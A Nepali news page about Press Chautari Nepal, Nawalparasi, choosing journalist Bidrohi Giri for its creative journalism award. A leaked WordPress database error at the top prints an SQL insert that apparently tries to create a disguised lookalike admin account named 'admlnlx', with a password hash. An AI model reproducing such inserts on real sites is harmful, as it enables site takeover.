WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoiNsvmnXFPCC4Qj.Qm/xreQB6Kvmh0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:58:52', '', 'admlnlx', 'admlnlx')
मोहन पौडेल
परासी, माघ ३ –
प्रेस चौतारी नेपाल नवलपरासीको चोरमारामा भएको बैठकले पत्रकार विद्रोही गिरीलाई यस बर्षको प्रेस चौतारी सिर्जनशिल पत्रकारिता पुरस्कारबाट सम्मान गर्ने निर्णय गरेको छ ।
प्रेस चौतारी नेपाल नवलपरासीका अध्यक्ष हिमालदेव पंगेनीको अध्यक्षतामा बसेको बैठकले प्रेस चौतारीको स्थापना दिवसको अवसरमा यहि माघ २२ गते परासीमा सो पुरस्कार प्रदान गर्ने निर्णय गरेको शाखा सचिव सागर पोखरेलले जानकारी दिनुभयो ।
प्रेस चौतारीले ६ बर्ष अगाडि प्रेस चौतारी सिर्जशिलता पत्रकारिता पुरस्कार स्थापना गरेको थियो । समाजसेवी ब्यक्तित्व दीपेन्द्र अधिकारीले आफ्ना छोरा युवा उद्यमी शक्ति अधिकारीको स्मृतिमा र प्रेस चौतारी नेपाल नवलपरासीका पूर्व अध्यक्ष कुलप्रसाद शर्माले आफ्ना माता पिताको सम्झना रु दुई लाख २५ हजारको प्रेस चौतारी सिर्जनशिल पत्रकारिता अक्षय कोष स्थापना गर्नु भएको थियो ।
अक्षय कोष मार्फत हेरक बर्ष एक जना पत्रकारलाई रु १५ हजार नगद,दोसल्ला र प्रमाण पत्रले सम्मान गरिदै आएको सचिव पोखरेलले बताउनुभयो ।
अक्षय कोष मार्फत पहिलो वर्ष प्रेस स्वतन्त्रता सेनानी लालकुमार भट्टराईलाई सम्मान गरिएको थियो । त्यसपछि शेरबहादुर केसी (रुपन्देही), केशब पराजुली, ( नवलपरासी) घनश्याम गौतम( गुल्मी) र राजकुमार रेस्मी (नवलपरासी)लाई यो पुरस्कारले सम्मान गरिएको छ ।
स्थापना दिवसलाई भब्य मनाउन कोषाध्यक्ष मोहन पौडेलको संयोजकत्वमा ब्यवस्थापन समिति र स्वागत समितिमा नेपाल पत्रकार महासंघ पूर्व अध्यक्ष एवम् प्रेस चौतारीका सल्लाहकार केशब पराजुलीको संयोकत्वमा तीन सदस्यीय समिति निर्माण गरिएको छ ।
बैठकले नेपाल पत्रकार महासंघ नवलपरासीका अध्यक्ष नारायण शर्मां र प्रेस चौतारी नवलपरासीकी सदस्य तुलसा खनालको शीघ्र स्वास्थ्य लाभको कामना गरेको छ । उहाँ दुबै जना लामो समय देखि स्वास्थ्य उपचारमा हुनुहुन्छ ।